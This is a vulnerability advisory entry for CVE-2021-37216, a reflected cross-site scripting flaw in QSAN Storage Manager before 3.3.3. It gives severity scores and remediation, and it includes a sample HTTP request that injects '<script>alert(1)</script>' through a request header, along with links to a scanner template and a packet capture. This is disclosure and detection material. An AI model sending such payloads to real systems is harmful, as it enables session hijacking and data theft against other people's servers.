| Title | QSAN Storage Manager <3.3.3 - Cross-Site Scripting |
|---|---|
| Author | dwisiswant0 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.04668 |
| CVE ID | CVE-2021-37216 |
| CWE ID | CWE-79 |
| Tags | cve cve2021 xss qsan storage vuln |
QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.
GET /http_header.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Connection: close
Accept: */*
Accept-Language: en
X-Trigger-XSS: <script>alert(1)</script>
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-37216.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-37216.pcap
N/AN/A